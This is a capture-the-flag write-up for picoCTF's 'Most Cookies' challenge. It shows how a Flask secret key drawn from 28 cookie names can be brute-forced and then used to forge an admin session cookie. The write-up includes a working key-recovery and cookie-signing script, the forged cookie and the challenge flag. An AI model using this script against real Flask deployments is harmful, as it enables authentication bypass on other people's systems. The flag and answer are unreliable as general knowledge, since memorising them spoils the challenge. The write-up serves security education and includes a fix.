Most Cookies

Problem

Alright, enough of using my own encryption. Flask session cookies should be plenty secure!

Files: server.py
Instance: http://mercury.picoctf.net:18835/

Solution

  1. Looking at the server script we can see that the app’s secret key is set to a random cookie name:

    cookie_names = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", "biscotti", "butter", "spritz", "snowball", "drop", "thumbprint", "pinwheel", "wafer", "macaroon", "fortune", "crinkle", "icebox", "gingerbread", "tassie", "lebkuchen", "macaron", "black and white", "white chocolate macadamia"]
    app.secret_key = random.choice(cookie_names)
  2. The app’s secret key is used to sign the Flask session cookie so that it cannot be modified without detection. However, since we know the secret key is one of the 28 cookie names, we can simply try them all until one of them successfully validates the cookie’s signature.

  3. So, the first step is to go to the website and copy a session cookie: eyJ2ZXJ5X2F1dGgiOiJzbmlja2VyZG9vZGxlIn0.YFNV9A.fnwblKJPgNM2A8VNOblzALp9bTI

  4. We can write a script that uses the logic from Flask’s SecureCookieSessionInterface to decode and encode cookies.

  5. But first we need to determine what value we should set in the cookie. We can find this on lines 45-47 of the server code.

    check = session["very_auth"]
    if check == "admin":
        resp = make_response(render_template("flag.html", value=flag_value, title=title))

    So, we need to store {"very_auth": "admin"} in the cookie.

  6. Running the solve script tries each secret key in turn; once it finds the key by successfully decoding a known cookie, it encodes the above cookie data with that key.

    Secret Key: whoopie pie
    Admin Cookie: eyJ2ZXJ5X2F1dGgiOiJhZG1pbiJ9.YFNdhA.jyQttlEVJ3eQhTuA9cEp8FDC_fk

  7. We can replace the cookie on the website with our admin cookie, refresh the page, and the flag will be shown.
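The solve script described in steps 4 to 6, as an added example that is not the writeup's own script: it rebuilds Flask's SecureCookieSessionInterface signing (itsdangerous URLSafeTimedSerializer, salt `cookie-session`, HMAC key derivation, SHA-1) with only the standard library, so it runs offline and makes plain why a `secret_key` drawn from a 28-name list provides no integrity at all: each candidate is checked against the captured cookie's signature, and the one that validates can sign any session data. The candidate list and the known cookie are the ones from the writeup above.

```python
import base64, hashlib, hmac, json, time, zlib
from typing import Dict, List, Optional

SALT = b"cookie-session"  # Flask's fixed salt for session cookies

def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def _signature(secret_key: str, signed_value: str) -> str:
    # itsdangerous "hmac" key derivation as Flask configures it: HMAC-SHA1(secret, salt)
    derived = hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()
    return _b64(hmac.new(derived, signed_value.encode(), hashlib.sha1).digest())

def sign_session(secret_key: str, data: Dict, timestamp: Optional[int] = None) -> str:
    """Build a Flask session cookie: base64(json) . base64(timestamp) . signature.
    Compression (a leading '.') is skipped; it never pays off for tiny payloads."""
    payload = _b64(json.dumps(data, separators=(",", ":"), sort_keys=True).encode())
    ts = int(time.time()) if timestamp is None else timestamp
    body = payload + "." + _b64(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    return body + "." + _signature(secret_key, body)

def verify_session(secret_key: str, cookie: str) -> Optional[Dict]:
    """Return the session dict if the signature checks out under secret_key, else None."""
    body, _, sig = cookie.rpartition(".")
    if not body or not hmac.compare_digest(sig, _signature(secret_key, body)):
        return None
    payload, _, _ts = body.rpartition(".")
    raw = _unb64(payload[1:]) if payload.startswith(".") else _unb64(payload)
    return json.loads(zlib.decompress(raw) if payload.startswith(".") else raw)

def recover_key(cookie: str, candidates: List[str]) -> Optional[str]:
    """Return the first candidate whose signature validates the cookie, or None."""
    return next((k for k in candidates if verify_session(k, cookie) is not None), None)

# The challenge's 28 candidate keys (from server.py) and the cookie captured in step 3.
COOKIE_NAMES = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", "biscotti", "butter", "spritz", "snowball", "drop", "thumbprint", "pinwheel", "wafer", "macaroon", "fortune", "crinkle", "icebox", "gingerbread", "tassie", "lebkuchen", "macaron", "black and white", "white chocolate macadamia"]
KNOWN_COOKIE = "eyJ2ZXJ5X2F1dGgiOiJzbmlja2VyZG9vZGxlIn0.YFNV9A.fnwblKJPgNM2A8VNOblzALp9bTI"

if __name__ == "__main__":
    key = recover_key(KNOWN_COOKIE, COOKIE_NAMES)
    print("Secret Key:", key)
    if key is not None:
        print("Admin Cookie:", sign_session(key, {"very_auth": "admin"}))
```

A `secret_key` generated with `secrets.token_bytes(32)` is the fix; the same loop doubles as a cheap audit of a deployment against a list of default or previously leaked keys.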

Flag

picoCTF{pwn_4ll_th3_cook1E5_743c20eb}
